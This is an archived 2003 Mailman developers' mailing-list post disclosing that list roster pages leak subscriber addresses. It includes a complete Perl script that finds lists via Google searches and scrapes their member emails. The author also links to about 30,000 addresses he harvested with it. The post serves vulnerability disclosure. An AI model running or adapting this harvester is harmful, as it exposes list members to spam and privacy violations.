[Mailman-Developers] bugtraq submission warning: email address harvesting exploit

Bernhard Kuemel darsie at gmx.at
Tue Nov 25 12:46:40 EST 2003 

David Champion wrote:
> * On 2003.11.16, in <3FB78C1A.5080702 at gmx.at>,
> 
>>This test may disable users of non graphical web browers or email 
>>only subscribers to subscribe.
> 
> I've generally found that encoding the address as HTML character
> entities works fine. I've had a bait address on my web page for quite
> some time, and it's never received any spam. It's readable to text
> browsers, it doesn't affect readability with unexpected font sizes, it
> takes little computation, and it's trivial to write.
> 
> My address would become:
> &#100;&#103;&#99;&#64;&#117;&#99;&#104;&#105;&#99;&#97;&#103;&#111;&#46;&#101;&#100;&#117;

While this approach may work in individual cases it is trivially 
and quite likely defeatet when the prize is 100,000 mailing lists 
with 1 to 5 million (!) high quality email addresses.

Since your answer is the only one and the problem does not appear 
to be addressed sufficiently I wrote an example exploit program 
that finds mailman lists and harvests their email addresses. 
After about 20 minutes it collected about 30.000 email addresses: 
http://bksys.at/bernhard/30,000%20email%20addresses.gz

The program can be further improved. It can be a little 
parallelized. It can check a site for further mailing lists (the 
admin overview has a more complete list than the listinfo 
overview). And it can be made to subscribe to mailing lists where 
the member list is only available to the list members.

If you think the problem is worth fixing please estimate how long 
it will take and I will wait a reasonable time for a fix before I 
post the problem and the exploit code to bugtraq. Otherwise I 
will post to bugtraq in about 1 week.

Here is the exploit code:

-------------------------------------------------------------
#!/usr/bin/perl -w

$n=0;
$u=0;
for ($i=0;1;$i+=10) {
         $#urls=-1;
         $google=`lynx --dump 
'http://www.google.com/search?q=%22Click+here+for+the+list%22+%22batched+in+a+daily+digest%22&start=$i'`;
#       print $google;
         @urls=$google=~/cache:.{12}:(.*?)\+%22/g;
         if ($#urls==-1) {last;}
#       print join("\n", at urls);
#       print "\naoeu $#urls\n";

         foreach $url (@urls) {
                 $u++;
                 $url=~s*/listinfo/*/roster/*;
                 print "$url...\n";
                 $roster=`lynx -connect_timeout=10 -dump $url`;
         #       print $roster;
                 @mails=$roster=~/^ +\* \(?\[\d+\](.* at 
.*?)\)?$/mgo;
                 foreach $mail (@mails) {
                         $mail=~s/ at /@/;
                         print "$mail\n";
                         $n++;
                 }
         print "mails=".($#mails+1).", total=$n, url=$u, 
google=$i\n";
#               exit;
         } #foreach url

} #while google
-----------------------------------------------------------

Have a nice day, Bernhard

-- 
Webspace; Low end Serverhousing ab 15 e, etc.: http://www.bksys.at
Linux Admin/Programmierer: http://bksys.at/bernhard/services.html

More information about the Mailman-Developers mailing list